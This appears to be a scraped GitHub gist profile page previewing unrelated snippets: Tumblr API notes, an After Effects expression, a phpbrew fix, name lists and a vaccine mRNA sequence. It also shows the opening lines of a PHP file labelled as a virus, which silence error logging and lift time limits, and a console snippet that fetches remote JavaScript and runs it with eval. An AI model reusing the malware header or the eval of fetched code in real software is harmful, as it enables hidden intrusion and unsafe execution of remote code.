Skip to content

Instantly share code, notes, and snippets.

Tumblr.BlogNameHelper.validate_tumblelog_name(t) {
return !/^-|-$|[^\-a-z0-9]|tumblr/i.test(t);
}

Rate Limits

Usage of the Tumblr API is rate limited in a few ways, but we respond with a 429 Limit Exceeded response whenever a consumer hits one of these limits. There is a global rate limit for all usage of the API per consumer, as well as a few per-feature rate limits, such as how many posts you can make per day. The error message or headers you receive with the 429 Limit Exceeded response should indicate what limit you've hit.

These rate limits include:

  • 300 API calls per minute, per IP address.
  • 18,000 API calls per hour, per IP address.
  • 432,000 API calls per day, per IP address.
  • 1,000 API calls per hour, per consumer key.
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / persistent_random_position.jsx
Created August 11, 2019 08:40
Persistent Random Position on Marker / Adobe After Effects CC
temp = thisComp.layer("Null 1").transform.anchorPoint[0];
markers = thisComp.layer("Null 1").marker
idx = markers.nearestKey(time).index;
if(markers.nearestKey(time).time > time) { idx--; }
if(idx < 1) { idx = 1; }
var seed = time;
if(temp == 50) {
seed = time;
}
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / loadExternalJs.md
Created September 27, 2019 06:38
javascript code snippet to use to load external JS libraries inside chrome dev tools console

How to import external JS libraries in Chrome dev tools console

fetch('link-to-external-js-library')
    .then(response => response.text())
    .then(text => eval(text))

example, loading lodash:

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / 0_ld-library-not-found-for-lgccfix.md
Last active October 9, 2019 04:45
macOS: ld: library not found for -lgcc

phpbrew install x.x.x +everything

While installing php with phpbrew, I kept getting the following error:

ld: library not found for -lgcc

I needed to symlink a dylib:

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / discogs_usernames.json
Last active December 30, 2019 10:07
2019 Top 5000+ Discogs Contributors
[
"Diognes_The_Fox",
"degm",
"chrisbaerchen",
"gippy",
"velove",
"teninchfan",
"ladrodipolli",
"choan",
"brianvy",
This file has been truncated, but you can view the full file.
["Archie Higdon", "Donald Hill Rock", "William B. Stiles", "James W. Beach", "Ralph Harry Tripp", "Richard John Clasen", "Sang Ahnn", "Yanming Yin", "Richard Carl Gilbert", "Arnold Lewis Villone", "Maria Holmes Mor", "Mary Kelley", "Bing Wang", "Scott Everett Rimbey", "Betty Carol Adjemian", "Michael Bahry Tamburro", "Jonathan George Bell", "Lance Fiondella", "Farrokh Sassani", "John Martin Bachar, Jr.", "Daniel Mohammad Sepasi", "Tae Geun Cho", "Matthew R. A. Sedlock", "Niels Gronbaek", "Fang Xie", "Zhao Xu", "Thomas Anthony Mc Cullough", "Lei Wang", "Melvin Rosenfeld", "Nadia Pavlivna Kozachenko", "Thomas Anthony Slobko", "Thorsten Bonato", "William Elisha Spraglin", "Peter Van Lancker", "Rodrigo Banuelos", "Silvia Harmsen", "Christopher Leigh Cagan", "Jeremy C. Smith", "Charles R. Clark", "Jeffrey Thomas Moore", "Frank No\u00e9", "Joseph Nicholas Ruskiewicz", "Bao Gia Nguyen", "Arsenii Rudich", "Scott Schumacher", "Enrico Avventi", "Fredric Martin Pollack", "Anna P\u00f3sfai", "Marko Kranjc", "Roger Van Ke
["Indiana University-Purdue University Indianapolis and Purdue University", "Yaroslavl State University", "University of Texas at Aus", "Institute of Physics, Estonian Academy of Sciences", "University of Ballarat", "St. Petersburg State Pedagogical University and St. Petersburg State University", "University of Texas at Houston", "University of Ioannina", "Universidad de Valladolid and Universidad Aut\u00f3noma de Nuevo Le\u00f3n", "Universit\u00e9 de Reims Champagne-Ardenne", "University of California, Berkeley", "Universit\u00e9 Bordeaux 1 and l'Institut National de Recherche en Informatique et en Automatique (INRIA)", "University of Agriculture", "Universidade de Lisboa and University of Texas at Austin", "Universit\u00e9 de Fribourg", "Loughborough University", "Babe\u015f-Bolyai Univers", "Ecole Centrale de Nantes", "Institute of Mathematics of SBRAS", "Hungarian Academy of Sciences and Taras Shevchenko National University of Kyiv", "University of California, Irvine", "Drexel University", "L'\u00c9cole
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / _worker.php
Last active October 23, 2024 09:12
lowerbeforwarden virus
/*
* Created by cpl.php
*/
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(3600);
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / BioNTech-Pfizer-SARS-CoV-2-Vaccine.md
Last active December 26, 2020 21:36
Source Code for BioNTech/Pfizer SARS-CoV-2 Vaccine

BioNTech/Pfizer SARS-CoV-2 Vaccine

Source Code

GAG AAΨ AAA CΨA GΨA ΨΨC ΨΨC ΨGG ΨCC CCA CAG ACΨ CAG AGA GAA CCC GCC ACC
AΨG ΨΨC GΨG ΨΨC CΨG GΨG CΨG CΨG CCΨ CΨG GΨG ΨCC AGC CAG ΨGΨ GΨG AAC CΨG 
ACC ACC AGA ACA CAG CΨG CCΨ CCA GCC ΨAC ACC AAC AGC ΨΨΨ ACC AGA GGC GΨG 
ΨAC ΨAC CCC GAC AAG GΨG ΨΨC AGA ΨCC AGC GΨG CΨG CAC ΨCΨ ACC CAG GAC CΨG 
ΨΨC CΨG CCΨ ΨΨC ΨΨC AGC AAC GΨG ACC ΨGG ΨΨC CAC GCC AΨC CAC GΨG ΨCC GGC